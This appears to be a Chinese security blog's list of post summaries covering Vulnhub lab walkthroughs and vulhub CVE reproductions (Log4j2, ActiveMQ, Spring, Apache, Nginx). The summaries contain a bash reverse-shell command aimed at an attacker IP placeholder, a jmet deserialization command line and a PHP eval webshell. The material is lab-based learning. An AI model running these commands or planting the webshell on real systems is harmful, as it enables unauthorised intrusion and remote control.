- 博客(31)
- 收藏
- 关注
RSS订阅原创 Vulnhub靶机-BLACKLIGHT
是一个密码本,但是该靶机并没有开启22端口,也不能进行ssh枚举连接,另一个文件。发现其中一个文件,查看该文件发现里面记录了两个文件名称。尝试与靶机建立会话,连接成功后告诉我们输入。查看端口是否开放,发现该端口是打开的。使用dirb遍历网站目录结构,命令。可能是告诉我们靶机的一个端口,使用。获得一个简易免杀语句,然后输入命令。给了一串字符和一个句话,说什么。查看帮助命令,发现其可以使用。网络选择桥接模式,使用命令。...
2022-08-18 18:27:36
1055
1
原创 Apache Airflow Celery 消息中间件命令执行漏洞复现(CVE-2020-11981)
利用Airflow的CeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflow的celery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
2022-08-14 16:20:46
1763
原创 Vulnhub靶机--Cengbox
使用该账号密码进行登录,发现是一个文件上传的php文件,上传任意内容,发现只能上传他指定的ceng文件类型。但是该处存在一个解析漏洞,会将ceng文件解析成php文件,所以上传包含以下内容的ceng文件。界面,输入任意内容,打开 burpsuite 进行抓包,将数据包保存下来。文件夹,猜测一个是上传到该处,访问该处的文件,文件正常。应该是一个管理员登录界面,后面可以看到网站主页是。进行php文件细致的探测,输入命令。尝试ssh连接,密码就是之前获得的。,查看后台进程,文件获取地址。获得大致目录,推测目录。.
2022-08-13 01:04:02
642
原创 网络安全学习小结--kali基本工具、webshell、代码审计
webshell连接工具:中国菜刀、Cknife、Altman、xise、Weevely、quasibot、Webshell-Sniper、蚁剑 antSword、冰蝎 Behinder、webacoo、哥斯拉 Godzilla、PhpSploit。两方连接通话命令,假定AB进行连接,A(1.1.1.1)为控制端,B(2.2.2.2)为受控端,前后不同即为开启顺序不同。漏洞脚本库,提权,shell获取等等。暴力遍历网站目录,获取网站结构。木马制作,后门连接shell。也有一句话木马,设定密码为。...
2022-08-09 20:27:11
2509
原创 Vulnhub靶机--born2root
访问该网页发现了一个rsa私钥,刚进入网页时得到了一个用户名@网络地址格式,是在暗示我们登陆这个用户,所以输入命令。但是jimmy也没有root权限,那么最后一个用户habi只能使用暴力破解ssh登录了,在。为使用该文件登陆martin用户,需要先给文件读写授权再使用ssh连接。查看是否有对应版本的脚本,没有对应版本,那么应该不是这个端口的问题。执行,但是发现该靶机禁止一切用户打开任何端口,所有导致脚本运行失败。发现与其他不同的是靶机开启了111端口,使用命令。三个用户,在使用命令。进行爆破,获得密码为。.
2022-08-08 21:11:36
861
原创 Drupal 远程代码执行漏洞复现(CVE-2018-7602)
使用parse_str,并存入options,还需要通过其他步骤来触发漏洞。的输入来处理请(GET,POST,COOKIE,REQUEST)中数据。建立vulhub/drupal/CVE-2018-7602/环境。访问http://靶机IP/shell.php即可看到新建的网页。使用以下poc.py,与官网不同的是强制定义命令为。对CVE-2018-7600漏洞的补丁通过过滤带有。会导致输入错误等等原因,所以进行了一点修改。中的URL进行URL编码,当对URL中的。形式的请求,发起请求需要对。...
2022-08-08 00:56:45
916
原创 GoAhead Server 环境变量注入(CVE-2021-42342)漏洞复现
此时的shell没有成功回显,可以先暂停shell,因为是环境变量注入,等待一段时间后便能再次连接。vulhub/goahead/CVE-2021-42342 环境搭建。登录靶机IP网页即可访问,使用文件中带的poc.py。同样的步骤,将其编译发送即可。进行base64编码。...
2022-08-06 20:59:56
890
原创 Vulnhub靶机--Chronos
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
2022-08-05 21:35:44
597
原创 Vulnhub靶机--DC8
访问该URL,其确为登录界面,输入john账号密码进入后台,发现该用户可以编辑 Contact Us 界面,该界面提交表单的时候会回显一个确认消息,而该确认消息类型中存在PHP文件类型,将消息修改为。获得了用户的邮箱地址、用户名以及密码,看这john名字应该是提示我们使用john破解密码,将用户名、密码保存到txt文件中,然后使用命令。并且选择PHP文件类型保存,在之前SQL注入我们得到了各个用户的邮箱地址,我们任意选择一个提交任意消息,发现回显的确认消息属于可执行命令。遍历出一个疑似用户登录的界面。...
2022-08-04 18:54:47
191
原创 Vulnhub靶机--DC7
使用该账户密码在页面登陆不了,但是我们前期主机发现可以看到该靶机打开ssh端口,使用ssh登陆靶机,成功登陆后进来就提示有一封邮件,邮件地址在 /var/mail/dc7user 发现该邮件记录了一个定时任务脚本,完成它上面固定的任务,而且还是使用 root 用户执行的,改脚本位置也可以清晰地看到在 /opt/scripts/backups.sh。然后就能搜索到该用户库,可以在这个staffdb发现该数据内容就是这个靶机网页的源码,我们在config.php处看到了用户名以及密码。......
2022-08-04 04:35:51
268
原创 Jmeter RMI 反序列化命令执行漏洞复现
针对目标主机地址及端口的RMI Registry建立远程连接(RMI—使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol)进行通信),连接成功后提交执行用户选择的 payload。可以看到,环境开启后将启动RMI服务并监听1099端口,我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令。靶场:vulhub—jmeter/CVE-2018-1297/根据输入命令转化为对应序列化内容,然后将消息发送。...
2022-08-02 19:33:26
808
原创 vulnhub靶机--6Day_Lab-v1.0.1
修改src值,查看apache默认配置文件,发现网站端口是在8080,但是只接受本地连接,因为在80端口输入的信息都被IPS拦截,所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入。双击进入数据包,发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截,打开burpsuite进行抓包,尝试重新发送,将src修改为index.php,回显了初始页面,说明该处存在目录路径漏洞。但是没有回显内容,尝试进行反弹shell,在原终端输入。.....
2022-08-01 21:48:57
258
原创 Apache APISIX 默认密钥漏洞复现
而check_conf中定义了一个script参数为lua文件类型执行,所以我们只需要将数据包按POST方式提交,并且在消息体中添加含有恶意lua代码的script参数。在其apisix/admin/routes.lua文件中,使用POST方式提交会将数据消息提交给check_conf。,在知道管理员密码的情况下我们可以通过构造一个恶意的router,其中包含恶意LUA脚本执行恶意命令。另外可以使用公开的POC进行漏洞利用,输入命令。打开vulhub,登录网址。,即可执行对应命令语句。...
2022-07-31 21:07:41
2019
原创 mongo-express 远程代码执行漏洞复现
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。
2022-07-30 20:20:44
1053
原创 Aapche Dubbo Java反序列化漏洞复现
将以下工具下载到攻击机中ZooKeeper — 输入以下命令,下载完成后解压即可ysoserial — 输入下面命令,如果该方式下载不成功直接浏览器访问网站下载漏洞复现准备攻击机,靶机安装有的靶机中输入下列命令开启环境攻击机终端中输入发现了2181端口是用于转发服务的,那么其作用可能是用于目标网页进行api服务转发,所以该端口可能包含了registry(远程注册表服务器,一般都是用ZooKeeper作为registry,我们可以尝试通过 zookeeper 进行连接进入先前下载的 zooke
2022-07-29 18:01:11
530
原创 Apache Fink 文件上传漏洞复现及利用
其它不修改,然后点击发送,因为该版本的ApacheFlink中存在有一个目录穿越漏洞,详细内容在。一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容。应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的。boundary是分隔符,不用关注,查看到其。处进行检查或者强制规定的路径,而是使用类似。这样的直接创建文件的命令,我们可以通过修改。,我们可以使用该漏洞查看我们创建的内容。,所以猜测该网页文件地址应该是在。的效果,所以我们修改消息体内容为。查看网络数据包,然后上传任意文件。.....
2022-07-28 20:00:14
996
原创 Django QuerySet.order_by() SQL注入漏洞复现
但是该靶场中数据库使用的是单独容器,而且该容器没有使用特定IP地址,如果我们使用上述的命令,连接到的是靶机本机的数据库,而不是容器本身的数据库,为了验证正确性,我们可以到靶机中进入数据库容器中。该网页使用的数据库是cve,一般情况下应该继续挖掘cve数据中的用户账号密码,但是该靶机中并没有用户列表等内容,所以我们可以挖掘该网页数据库的账号密码。可以看到一共开了两个容器,一个是web服务的容器,一个是数据库的容器。内容相同,说明该处存在注入点,可以使用以下命令验证注入点存在。路径下,该页面的源码是。.....
2022-07-27 20:46:50
597
原创 Spring Cloud Function SpEL 表达式命令注入漏洞复现及利用
在源码中可以看到,未修改前的代码中spring.cloud.function.routing-expression参数被functionFromExpression接口中的getValue进行处理,该方法使用了StandardEvaluationContext来进行解析SeEL表达式,从而形成了注入漏洞。时,会触发RoutingFunction逻辑,在SpringCloudFunction中,RoutingFunction类的apply方法会将请求头中的。另启一个终端,再终端中输入。...
2022-07-26 18:47:58
942
原创 Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞复现
查看其路由规则,因为这是个靶场,所以肯定是允许你访问的,正经网站肯定是不会给你访问的,打开burpsuite进行放包,我们需要添加一个新的路由到网关,添加新的路由需要用。表达式,所以我们可以选择任一过滤器进行使用,这里使用过滤器。然后使用refresh刷新路由配置,refresh也需要用。,并且可以看到他已经成功执行了我们输入的命令whoami。查看到路由表配置,此时可以看到多出了我们新添加的路由路径。方式提交,而网关最终会将所有的请求交给过滤链表。进行处理,所以我们将待执行的命令放到。...
2022-07-25 19:51:59
864
原创 Spring框架Data Binding与JDK 9+导致的远程代码执行漏洞复现
该远程代码执行漏洞起因有可能与对SpringCore所做的更改有关,该更改弃用了使用Java序列化和反序列化的旧“异常克隆”函数。该操作导致Java中使用不受信任的字符串值的反序列化运行远程代码。因为需要设置c1、c2、suffix值,所以攻击机中打开burpsiute进行抓包,修改数据包为。,那么我们可以尝试构造特定的类,从而在目标web目录下创建特定文件。sudodockerps//记住你使用8983端口容器ID,记前两位就行。就可以看到我们输入的命令执行成功了。,该页面的页源代码是。......
2022-07-24 15:58:47
781
原创 Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
2022-07-23 16:01:49
3108
原创 Apache Flink jobmanager/logs 目录穿越漏洞复现
这个错误的返回就是说明我们没有成功跳出当前web目录,说明他存在有URL检查,拦截了我们的访问,那么我们可以在进行一次编码,来一个编码的二次方。%2fpasswd//这是“…URL后面的,而且他还不会将这个文件名称的URL进行加密等操作,直接放到URL后面进行访问,诶我这么说可能不太明白,就直接看图吧。%252fetc%252fpasswd//这是“…,一直添加到他成功访问到文件就行,或者是直接加一长串,那肯定就能访问到了。,告诉我们请求错误,你要找的文件不在这,所以我们就需要继续在URL中添加。.....
2022-07-22 14:52:08
1151
原创 Apache Log4j2 lookup JNDI 注入漏洞复现及利用
这时候有过有过js经验的朋友都会知道嗷,编写网站的时候一般都会使用到JNDI这个接口进行目录服务查询,而JNDI中有LDAP的类,他可以用来执行我们的恶意语句,为了方便恶意语句的回显,我们到。查看网络,重新载入一下,看看每个数据包,诶这个时候就会发现有一个数据包存在参数上传,并且URL是在另一个地址。,为什么不用那个,因为啊那个是上传系统参数的数据包,有很大的区别,感兴趣可以自己去搜一下,因为本人java也不是很精通,所以就不多嘴了。并访问,这时我们的攻击机终端就会收到新的消息,这就代表命令。.......
2022-07-21 19:39:59
1159
原创 Nginx 解析漏洞复现及利用
Nginx解析漏洞该解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
2022-07-20 13:46:30
7437
原创 ActiveMQ 反序列化漏洞复现及利用
会发现什么都没有发生,但是在被攻击机中输入bash-i>&/dev/tcp/攻击机IP/44440>&1他是可以正常连接的,说明命令没有问题,那么唯一的可能就是存在了检验,不给执行该命令,所以我们可以进行简单的绕过,将命令进行base64编码。java-jarjmet-0.1.0-all.jar-Qhacker-IActiveMQ-s-Y“bash-i>&/dev/tcp/攻击机IP/44440>&1”-YpROME被攻击机IP61616。(一定要是java8!......
2022-07-19 20:36:57
1080
1
原创 实验四 /*CTF实践*/
目的:获取靶机Web Developer 文件/root/flag.txt中flag。基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap”文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。实施细节如下:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。截图。nmap.
2021-01-07 15:32:52
359
原创 实验三 /*XSS和SQL注入*/
XSS部分:利用Beef劫持被攻击者客户端浏览器。实验环境搭建。角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);被攻击者:访问留言簿网站,浏览器被劫持。1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图首先,搭建好网站,如下然后使用AWVS扫描网站,发现确实存在XSS漏洞,如下图:2、Kali使用beef生成
2021-01-07 15:01:54
246
原创 实验二 /*网络嗅探与身份验证*/
标题实验网络拓扑1. A主机上外网,B运行sinffer(Wireshark)选定只抓源为A的数据)。1.1 写出以上过滤语句。ip.scr==192.168.43.1这是在kali-linux的虚拟机里面的的wireshark截的图(即B,就是我的kali虚拟机)我们可以看见source那一栏的ip都是一样的,因为输入了过滤的语句。1.2 B是否能看到A和外网的通信(A刚输入的帐户和口令)?为什么?不能的,因为在直接B 抓A的包的情况下,B 端抓的数据都丢掉了,我们看不见数据包2.1 为了
2021-01-07 14:32:42
287
原创 实验一 /*被动扫描,利用搜索引擎或相关网站*/
1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。2、照片中的女生在哪里旅行?截图搜索到的地址信息。 搜索图中店铺所含信息: letrenhuit 获得店铺地址:38 avenue de Suffren,75015 Paris,France 到百度地图中输入地址即可3、手机位置定位。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity),基站编号,
2020-11-07 18:58:25
392
原创 如何利用BurpSuite复刻Dedecms漏洞
今天给大家讲解一下如何使用BurpSuite随意修改Dedecms的其他用户的密码。Dedecms漏洞复刻创建Dedecms网站安装BurpSuite三级目录创建Dedecms网站首先第一步是先创建一个网站下面是建立网站的流程链接:链接: link.安装BurpSuiteBurpSuite三级目录...
2020-10-30 22:43:52
354
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人